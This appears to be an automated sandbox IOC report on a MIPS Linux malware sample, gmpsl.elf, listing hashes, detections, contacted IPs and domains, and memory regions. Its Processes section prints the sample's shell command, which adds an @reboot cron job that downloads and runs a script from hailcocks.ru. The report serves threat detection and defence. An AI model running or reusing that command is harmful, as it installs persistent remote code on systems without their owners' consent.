Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

gmpsl.elf

ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy:	5.559193399156919
Filename:	gmpsl.elf
Filesize:	89400
MD5:	353a49ca2c9b8b35fb036b2de1587fc4
SHA1:	e5cd1ab8dc2c224a5b82113a41ec46479895ae27
SHA256:	cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
SHA512:	8a47f0d0a8899d153cf80d5579d7ca8f81b9efe9daf93a2f60f72d5ad1ed77a360f3ff6f93cad6b016a52ec6a6f76b94bf2d427f6d9eda0bc5f7cf609e6fd484
SSDEEP:	1536:GJTjy914iDyIV6n30taWKqlpbfc/SLuZ++5+BJoK+mcS/:GJTj614NNczc/0ublmx
Preview:	.ELF....................`.@.4....Z......4. ...(...............@...@.$P..$P..............$P..$PE.$PE.L....,..........Q.td...............................<l..'!......'.......................<H..'!... .........9'.. ........................<...'!............79

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Enumerates processes within the "proc" file system	Persistence and Installation Behavior	OS Credential Dumping
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior
Sample listens on a socket	Networking
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion	Security Software Discovery
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion

/var/spool/cron/crontabs/tmp.iGlZeG

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.iGlZeG
Category:	dropped
Dump:	tmp.iGlZeG.19.dr
ID:	dr_0
Target ID:	19
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.148371805764079
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQNvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJo0:8QjHig8NJeHLUHYC+GABjnOGAFkz
Size:	306
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

Processes

Path

Cmdline

Malicious

/tmp/gmpsl.elf

/bin/sh

sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/crontab

crontab -

/tmp/gmpsl.elf

URLs

Name

Malicious

http://hailcocks.ru/wget.sh;

unknown

Details

Name:	http://hailcocks.ru/wget.sh;
TargetID:	19
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.iGlZeG.19.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

daisy.ubuntu.com

162.213.35.25

kingstonwikkerink.dyn

193.233.193.45

IPs

Domain

Country

Malicious

88.151.195.22

unknown

Azerbaijan

Details

IP:	88.151.195.22
TargetID:	-1
Country:	Azerbaijan
Countrycode:	AZE
ASN number:	15723
ASN name:	AZERONLINEAZ
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to many ports of the same IP (likely port scanning)	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

195.133.92.51

unknown

Russian Federation

Details

IP:	195.133.92.51
TargetID:	-1
Country:	Russian Federation
Countrycode:	RUS
ASN number:	197695
ASN name:	AS-REGRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to many ports of the same IP (likely port scanning)	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

31.13.248.89

unknown

Bulgaria

Details

IP:	31.13.248.89
TargetID:	-1
Country:	Bulgaria
Countrycode:	BGR
ASN number:	34224
ASN name:	NETERRA-ASBG
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

Memdumps

Base Address

Regiontype

Protect

Malicious

55ada6818000

page read and write

55ada6590000

page execute read

7fff63fc4000

page execute read

7f0cdc456000

page read and write

7f0d62a90000

page read and write

7f0d61dbc000

page read and write

7f0d5c000000

page read and write

7f0cdc416000

page execute read

7f0d62430000

page read and write

55ada9d8e000

page read and write

7f0d6244d000

page read and write

7f0d6240d000

page read and write

7f0d62ad5000

page read and write

7f0d6206c000

page read and write

7f0d62a88000

page read and write

55ada8837000

page read and write

7f0d6295f000

page read and write

7f0d615a6000

page read and write

7fff63fa1000

page read and write

55ada8820000

page execute and read and write

55ada6822000

page read and write

7f0cdc459000

page read and write

7f0d6277e000

page read and write

7f0d61dae000

page read and write

7f0d5c021000

page read and write

There are 15 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
gmpsl.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportgmpsl.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
gmpsl.elf